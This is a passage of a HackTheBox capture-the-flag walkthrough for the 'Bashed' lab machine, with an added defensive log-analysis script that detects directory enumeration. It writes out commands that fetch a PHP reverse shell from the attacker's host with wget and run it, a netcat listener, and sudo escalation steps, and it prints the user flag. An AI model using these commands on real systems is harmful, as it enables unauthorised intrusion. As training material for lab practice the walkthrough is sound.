Bashed — HackTheBox

Manas Ramesh
Feb 10, 2021

https://www.linkedin.com/in/manas-ramesh-9a7ba4149

Overview

Bashed is a retired, comparatively easy HackTheBox machine. You are given the IP of the target server, and the goal is to compromise it and find both the user and root flags. The Bashed server has a hidden web shell, which makes it easy to gain access. Privilege escalation is carried out through other privileged users. Let's get into the machine.

First of all, we will start the machine and connect with HackTheBox VPN.

IP for the bashed: 10.129.94.177

Let's start with an Nmap port scan.

>mkdir nmap

>nmap -sC -sV -oS nmap/nmap.basic 10.129.94.177

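The above command runs Nmap with the default script engine (-sC) and service version detection (-sV), and saves the output to nmap/nmap.basic. Note that -oS selects Nmap's "script kiddie" output format, which is why the result below is written in leetspeak; -oN writes the normal format instead. The result is displayed below: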

StaRting Nmap 7.91 ( hTtpS://Nmap.org ) at 2021–02–10 14:31 |ST
NMap scan r3p0rt f0R 10.129.94.177
Ho$t !z Up (0.15z lat3ncy).
NOt shown: 999 CL0sed poRts
PoRT ST4Te $eRV!C3 v3Rs10N
80/tcP 0p3n hTtp 4pach3 htTpd 2.4.18 ((UbuNtu))
|_http-ServEr-heAD3r: 4Pach3/2.4.18 (Ubuntu)
|_http-t|tlE: 4rR3x3l’z D3v3l0pmEnt S|t3

S3rvice deT3CT|on pErform3d. PL3a$e REport any |nc0rr3ct r3$ults at httpz://Nmap.org/submit/ .
NmAp d0n3: 1 |p addr3Ss (1 hoST up) ScAnnEd in 13.70 $ecOndS

Here port 80 is open and serves an HTTP web page. Let's analyze it in a web browser. On the page you can see "phpbash", and a quick Google search shows that it is a web shell.

[Screenshot: what is phpbash]

After that, I will run a Gobuster wordlist scan. Gobuster is used to find hidden files and folders on the web server.

>gobuster dir -u http://10.129.94.177/ -w /usr/share/wordlist/dirb/medium.txt

  • -u to specify the URL
  • -w to specify a wordlist location

[Screenshot: gobuster result]

Here you can see a dev folder. Inside the dev folder, you can find a web shell.

[Screenshot: hidden webshell]
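From the defender's side, the Gobuster run above appears in the web server's access log as a burst of 404s from one client, followed by requests to whatever the wordlist found. The following Python script is an added example, not part of the original writeup: it flags such clients in Apache combined-format logs and lists the paths they confirmed exist. The log lines, thresholds, user-agent string and the /dev/phpbash.php file name are constructed for illustration.

```python
import re
from collections import defaultdict

# Apache "combined" log format: ip, ident, user, [time], "request", status, size, "referer", "agent"
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

def find_enumeration(lines, min_404=5, min_ratio=0.7):
    """Return {ip: stats} for clients whose traffic looks like wordlist enumeration."""
    per_ip = defaultdict(lambda: {"total": 0, "not_found": 0, "found": [], "agents": set()})
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # ignore lines that are not in combined format
        s = per_ip[m["ip"]]
        s["total"] += 1
        s["agents"].add(m["ua"])
        if m["status"] == "404":
            s["not_found"] += 1
        elif m["status"][0] in "23" and m["path"] not in s["found"]:
            s["found"].append(m["path"])  # resources the client confirmed exist
    # Thresholds are assumptions: many 404s AND a high share of 404s per client.
    return {ip: s for ip, s in per_ip.items()
            if s["not_found"] >= min_404 and s["not_found"] / s["total"] >= min_ratio}

def _entry(ip, path, status, ua):
    # Helper that builds one constructed combined-format log line.
    return f'{ip} - - [10/Feb/2021:14:40:00 +0530] "GET {path} HTTP/1.1" {status} 512 "-" "{ua}"'

# Constructed sample log: one client walking a wordlist, one ordinary visitor.
SAMPLE = (
    [_entry("10.10.14.5", f"/{w}", 404, "gobuster/3.0.1")
     for w in ("admin", "backup", "login", "test", "old", "secret", "api", "portal")]
    + [_entry("10.10.14.5", "/dev", 301, "gobuster/3.0.1"),
       _entry("10.10.14.5", "/uploads", 301, "gobuster/3.0.1"),
       _entry("10.10.14.5", "/dev/phpbash.php", 200, "Mozilla/5.0"),
       _entry("192.0.2.20", "/", 200, "Mozilla/5.0"),
       _entry("192.0.2.20", "/favicon.ico", 404, "Mozilla/5.0")]
)

if __name__ == "__main__":
    for ip, s in find_enumeration(SAMPLE).items():
        print(f"{ip}: {s['not_found']}/{s['total']} requests were 404, agents={sorted(s['agents'])}")
        print("  paths to review:", ", ".join(s["found"]))
```

The "paths to review" list is the useful part for triage: it shows which directories and files the scan exposed, so forgotten development content can be removed or access-controlled.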

Using the web shell, we are going to upload a PHP reverse shell. In my case, I am using pentestmonkey's PHP reverse shell. Set LHOST and LPORT to your HTB VPN IP and a port number.

[Screenshot: LHost and LPORT]

The top 10 lines look like this. Now let's start a Netcat listener on port 1234 and, meanwhile, upload the malicious PHP script to the target system using the wget command. For that, I will start a web server using Python.

>python -m SimpleHTTPServer 80

>nc -nvlp 1234

and execute the commands below in the web shell:

>cd /tmp

>wget http://10.10.14.5/hack.php

>php hack.php

[Screenshot: netcat listener and python server]

[Screenshot: downloading php reverse shell]

After running the PHP script above, you will get a reverse shell on your Netcat listener. Then we can spawn a shell with Python to get a properly interactive TTY.

>python --version

>python -c 'import pty;pty.spawn("/bin/bash")'

The user flag is in arrexel's home folder.

>cat /home/arrexel/user.txt

2c281f318555dbc1b856957c7147bfc1

Now it's time for privilege escalation. Let's check what sudo rights the www-data user has.

>sudo -l

The output shows that www-data can run commands as scriptmanager with sudo rights.

>sudo -u scriptmanager bash

[Screenshot: gaining scriptmanager privileges]

There is a suspicious-looking folder called scripts in the / directory.
